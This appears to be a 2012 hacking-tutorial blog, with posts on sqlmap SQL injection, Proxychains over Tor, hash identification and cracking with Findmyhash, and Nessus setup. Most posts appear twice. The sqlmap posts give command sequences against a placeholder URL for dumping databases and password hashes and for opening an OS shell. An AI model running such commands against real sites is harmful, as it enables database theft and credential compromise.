If you don't read Sqlmap - Sqlinjection part 1 click here.
Now we see an advanced options for sqlmap.
With -o we turn on all optimization switches
With --random-agent we can use a randomly selected http user-agent
With --ignore-proxy we ignore a default proxy of http (use --ignore-proxy only when sqlmap return some error)
With --level=level we change the level of test (default level=1, 1-5)
With --risk=risk we change risk of test (default risk=1, 0-3)
With --technique=technique we change technique of injection (default "beust")
We can find a current user of db using : --current-user
If we add --password we can dump hashes password : --current-user --password
With --dump-all we can dump all database
We can open a shell with --os-shell , or if we want use metasploit we can use :
--msf-path=/path/of/msf
We can use tor to proxy sqlmap with : --tor
If you have any problem or if you need some explanations just write under this post!
Saturday, November 24, 2012
Proxychains
Proxychains is a program that chains together different proxies and uses them on any program you want.
For example you can use proxychains for run metasploit with TOR (proxychains msfconsole) or using a vpn with TOR
You can install proxychains with : sudo apt-get install proxychains
If you use arch you can install from AUR
Now if you want, you can change your proxychains.conf , adding to [proxy list] a proxy that you want for example : socks5 127.0.0.1 9050 (for tor)
Now you can use proxychains with all program for example openvpn, nmap ecc..
If you have any problem or if you need some explanations just write under this post!
For example you can use proxychains for run metasploit with TOR (proxychains msfconsole) or using a vpn with TOR
You can install proxychains with : sudo apt-get install proxychains
If you use arch you can install from AUR
Now if you want, you can change your proxychains.conf , adding to [proxy list] a proxy that you want for example : socks5 127.0.0.1 9050 (for tor)
Now you can use proxychains with all program for example openvpn, nmap ecc..
If you have any problem or if you need some explanations just write under this post!
Monday, November 19, 2012
Hash Identifier
Do you have some hash to decrypt (see last article) but you don't know what kind of hash is it ?
So you can use a python script called Hash Identifier for know what kind of hash it is.
You can download Hash Identifier from here.
Encryption formats supported: ADLER-32
CRC-32
CRC-32B
CRC-16
CRC-16-CCITT
DES(Unix)
FCS-16
GHash-32-3
GHash-32-5
GOST R 34.11-94
Haval-160
Haval-192 110080 ,Haval-224 114080 ,Haval-256
Lineage II C4
Domain Cached Credentials
XOR-32
MD5(Half)
MD5(Middle)
MySQL
MD5(phpBB3)
MD5(Unix)
MD5(Wordpress)
MD5(APR)
Haval-128
MD2
MD4
MD5
MD5(HMAC(Wordpress))
NTLM
RAdmin v2.x
RipeMD-128
SNEFRU-128
Tiger-128
MySQL5 - SHA-1(SHA-1($pass))
MySQL 160bit - SHA-1(SHA-1($pass))
RipeMD-160
SHA-1
SHA-1(MaNGOS)
Tiger-160
Tiger-192
md5($pass.$salt) - Joomla
SHA-1(Django)
SHA-224
RipeMD-256
SNEFRU-256
md5($pass.$salt) - Joomla
SAM - (LM_hash:NT_hash)
SHA-256(Django)
RipeMD-320
SHA-384
SHA-256
SHA-384(Django)
SHA-512
Whirlpool
And more…
For run this script you need python, after move into directory (cd ..) and digit:
./Hash_ID.py
Now we must put our hash , wait a moment .. Now we know what kind of hash is our hash !
If you have any problem or if you need some explanations just write under this post!
So you can use a python script called Hash Identifier for know what kind of hash it is.
You can download Hash Identifier from here.
Encryption formats supported: ADLER-32
CRC-32
CRC-32B
CRC-16
CRC-16-CCITT
DES(Unix)
FCS-16
GHash-32-3
GHash-32-5
GOST R 34.11-94
Haval-160
Haval-192 110080 ,Haval-224 114080 ,Haval-256
Lineage II C4
Domain Cached Credentials
XOR-32
MD5(Half)
MD5(Middle)
MySQL
MD5(phpBB3)
MD5(Unix)
MD5(Wordpress)
MD5(APR)
Haval-128
MD2
MD4
MD5
MD5(HMAC(Wordpress))
NTLM
RAdmin v2.x
RipeMD-128
SNEFRU-128
Tiger-128
MySQL5 - SHA-1(SHA-1($pass))
MySQL 160bit - SHA-1(SHA-1($pass))
RipeMD-160
SHA-1
SHA-1(MaNGOS)
Tiger-160
Tiger-192
md5($pass.$salt) - Joomla
SHA-1(Django)
SHA-224
RipeMD-256
SNEFRU-256
md5($pass.$salt) - Joomla
SAM - (LM_hash:NT_hash)
SHA-256(Django)
RipeMD-320
SHA-384
SHA-256
SHA-384(Django)
SHA-512
Whirlpool
And more…
For run this script you need python, after move into directory (cd ..) and digit:
./Hash_ID.py
Now we must put our hash , wait a moment .. Now we know what kind of hash is our hash !
If you have any problem or if you need some explanations just write under this post!
Saturday, November 10, 2012
Sqlmap - Sqlinjection part 1
Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
-Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
-Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
-Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
-Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
-Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
-Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
-Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
-Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
-Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
You can download sqlmap from here
After download extract sqlmap.
Move into directory (cd sqlmap)
For run sqlmap we need python 2.6 or python 2.7; you can download python from official website.
For more info about sqlmap click here
First we need a url to analize, for example www.website.com/pag.php?id=4
Now we can analize this url with sqlmap :
./sqlmap.py -u "www.website.com/pag.php?id=4"
If parameter is injectable (in this case parameter is id) we can see a list of databases adding --dbs.
./sqlmap.py -u "www.website.com/pag.php?id=4" --dbs
After we can see a list of tables that are content in one databases adding --tables
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --tables
After we can see a list of columns that are content in one table adding --columns
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --columns
Now if you're interested about the contents you can dump the database with --dump
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --dump
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --dump (so you dump all tables in database)
If you have any problem or if you need some explanations just write under this post!
-Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
-Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
-Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
-Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
-Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
-Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
-Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
-Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
-Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
You can download sqlmap from here
After download extract sqlmap.
Move into directory (cd sqlmap)
For run sqlmap we need python 2.6 or python 2.7; you can download python from official website.
For more info about sqlmap click here
START
First we need a url to analize, for example www.website.com/pag.php?id=4
Now we can analize this url with sqlmap :
./sqlmap.py -u "www.website.com/pag.php?id=4"
If parameter is injectable (in this case parameter is id) we can see a list of databases adding --dbs.
./sqlmap.py -u "www.website.com/pag.php?id=4" --dbs
After we can see a list of tables that are content in one databases adding --tables
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --tables
After we can see a list of columns that are content in one table adding --columns
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --columns
Now if you're interested about the contents you can dump the database with --dump
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --dump
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --dump (so you dump all tables in database)
If you have any problem or if you need some explanations just write under this post!
Thursday, November 8, 2012
Findmyhash - Crack hash
Findmyhash is a python scritp for crack hash string.
You can download this script from here
Findmyhash supports :
MD4 - RFC 1320
MD5 - RFC 1321
SHA1 - RFC 3174 (FIPS 180-3)
SHA224 - RFC 3874 (FIPS 180-3)
SHA256 - FIPS 180-3
SHA384 - FIPS 180-3
SHA512 - FIPS 180-3
RMD160 - RFC 2857
GOST - RFC 5831
WHIRLPOOL - ISO/IEC 10118-3:2004
LM - Microsoft Windows hash
NTLM - Microsoft Windows hash
MYSQL - MySQL 3, 4, 5 hash
CISCO7 - Cisco IOS type 7 encrypted passwords
JUNIPER - Juniper Networks $9$ encrypted passwords
LDAP_MD5 - MD5 Base64 encoded
LDAP_SHA1 - SHA1 Base64 encoded
OPTIONS
-h hash_value: If you only want to crack one hash, specify its value with this option. (python findmyhash.py MD5 -h "098f6bcd4621d373cade4e832627b4f6")
-f file: If you have several hashes, you can specify a file with one hash per line. (python findmyhash.py MYSQL -f mysqlhashesfile.txt)
-g : if your hash cannot be cracked, search it in Google and show all the results.
FOR MORE INFO VISIT : http://code.google.com/p/findmyhash/
If you want know what kind of hash is yours check this article
If you have any problem or you need some explanations just write under this post !
You can download this script from here
Findmyhash supports :
MD4 - RFC 1320
MD5 - RFC 1321
SHA1 - RFC 3174 (FIPS 180-3)
SHA224 - RFC 3874 (FIPS 180-3)
SHA256 - FIPS 180-3
SHA384 - FIPS 180-3
SHA512 - FIPS 180-3
RMD160 - RFC 2857
GOST - RFC 5831
WHIRLPOOL - ISO/IEC 10118-3:2004
LM - Microsoft Windows hash
NTLM - Microsoft Windows hash
MYSQL - MySQL 3, 4, 5 hash
CISCO7 - Cisco IOS type 7 encrypted passwords
JUNIPER - Juniper Networks $9$ encrypted passwords
LDAP_MD5 - MD5 Base64 encoded
LDAP_SHA1 - SHA1 Base64 encoded
OPTIONS
-h hash_value: If you only want to crack one hash, specify its value with this option. (python findmyhash.py MD5 -h "098f6bcd4621d373cade4e832627b4f6")
-f file: If you have several hashes, you can specify a file with one hash per line. (python findmyhash.py MYSQL -f mysqlhashesfile.txt)
-g : if your hash cannot be cracked, search it in Google and show all the results.
FOR MORE INFO VISIT : http://code.google.com/p/findmyhash/
If you want know what kind of hash is yours check this article
If you have any problem or you need some explanations just write under this post !
Thursday, November 1, 2012
Nessus - Server Scan
In computer security, Nessus is a proprietary comprehensive vulnerability scanning program.
It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.
You can download nessus from official website, click here
Now you must obtain an activation code from here.
Now you must activate your code :
/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx
Now you can start nessus' deamon :
Move into directory : /opt/nessus/sbin
sudo ./nessusd
Now we must add an user:
sudo /opt/nessus/sbin/nessus-adduser
Now we can start nessus ! Open our browser and go to : https://localhost:8834
If you have any problem or you need some explanations just write under this post !
It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.
You can download nessus from official website, click here
Now you must obtain an activation code from here.
Now you must activate your code :
/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx
Now you can start nessus' deamon :
Move into directory : /opt/nessus/sbin
sudo ./nessusd
Now we must add an user:
sudo /opt/nessus/sbin/nessus-adduser
Now we can start nessus ! Open our browser and go to : https://localhost:8834
If you have any problem or you need some explanations just write under this post !
Subscribe to:
Posts (Atom)